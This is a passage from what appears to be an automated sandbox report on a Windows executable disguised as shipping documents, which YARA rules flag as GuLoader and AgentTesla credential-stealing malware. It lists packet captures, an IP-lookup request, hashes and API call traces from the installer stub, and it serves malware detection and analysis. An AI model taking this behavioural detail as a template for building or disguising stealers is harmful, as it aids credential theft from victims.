Oct 31, 2024 11:40:48.660072088 CET	1236	IN	Data Raw: c5 a1 3f 9c 53 c0 26 f8 f0 37 6f e7 6f e7 7e 76 a9 5e 6b 93 d8 01 48 d1 c1 94 95 99 b2 8a a5 b9 3d c2 31 f9 21 8b 59 52 96 dd 56 59 05 0b c9 f7 28 88 e4 57 1f f9 5d 7f 13 6d bd 0b f9 d6 aa 2a f1 55 72 5b 83 83 95 ad 67 90 41 71 2a 6a 61 d4 74 a2 Data Ascii: ?S&7oo~v^kH=1!YRVY(W]mUr[gAqjat~CN UCmF8TSy&M]`&5\|To}7O T!ae"r**Mov^1p506\ULxOV_"N#\hVc/"rB,+"g
Oct 31, 2024 11:40:48.660088062 CET	212	IN	Data Raw: 06 ea 37 7b a3 8d 77 25 06 a4 41 e3 27 b4 5d 0f b6 75 60 6b 82 4f 4b cc 8a 64 d4 a8 11 a4 d7 b0 e0 6c 6a 9a e9 8d fe ae ae 1d d8 63 7d 17 11 d1 b7 1a 18 5c e3 30 6c af 5a 8c 17 4c 72 9f 81 92 49 0f 67 2c 4f 54 8e 88 9f 5e 43 d5 5d ae 39 3f 60 77 Data Ascii: 7{w%A']u`kOKdljc}\0lZLrIg,OT^C]9?`wf6Kv0%Eyd(KC)4x=PR9OP[aD8%@,`M{7'~1tw5'='~

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	56195	172.67.74.152	443	6496	C:\Users\user\Desktop\Shipping documents 000293994900.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 10:40:51 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-31 10:40:51 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 10:40:51 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8db307807ad7e9b1-DFW
2024-10-31 10:40:51 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 Data Ascii: 173.254.250.77

Target ID:	0
Start time:	06:38:58
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping documents 000293994900.exe"
Imagebase:	0x400000
File size:	739'546 bytes
MD5 hash:	C8D26F7208EAAA31A839EC190489C9A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:40:38
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping documents 000293994900.exe"
Imagebase:	0x400000
File size:	739'546 bytes
MD5 hash:	C8D26F7208EAAA31A839EC190489C9A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	15.2%
Signature Coverage:	18.5%
Total number of Nodes:	1510
Total number of Limit Nodes:	43

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000293994900.exe,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

SeShutdownPrivilege, xrefs: 0040376D
C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
Low, xrefs: 0040353C
\Temp, xrefs: 00403520
C:\Users\user\Uploadable\normallnnens, xrefs: 004034EE, 004035F1, 00403670, 0040367A
"C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 004033CC, 004033D2, 00403593
TEMP, xrefs: 0040354E
TMP, xrefs: 00403556
C:\Users\user\Desktop\Shipping documents 000293994900.exe, xrefs: 004036D3
1033, xrefs: 0040356A
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
C:\Users\user\Uploadable\normallnnens, xrefs: 004035FC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
~nsu.tmp, xrefs: 00403645
Error launching installer, xrefs: 004035D6
NSIS Error, xrefs: 004033B7

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000293994900.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-2404171667
Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

4Te, xrefs: 00405525
{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: 4Te${
API String ID: 590372296-2932814199
Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 00406131

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Call, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll, xrefs: 00405F2F

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2462294625
Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
\*.*, xrefs: 004057DB
"C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 00405779

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1630077837
Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 00403C55 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Strings

4Te, xrefs: 00404004

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

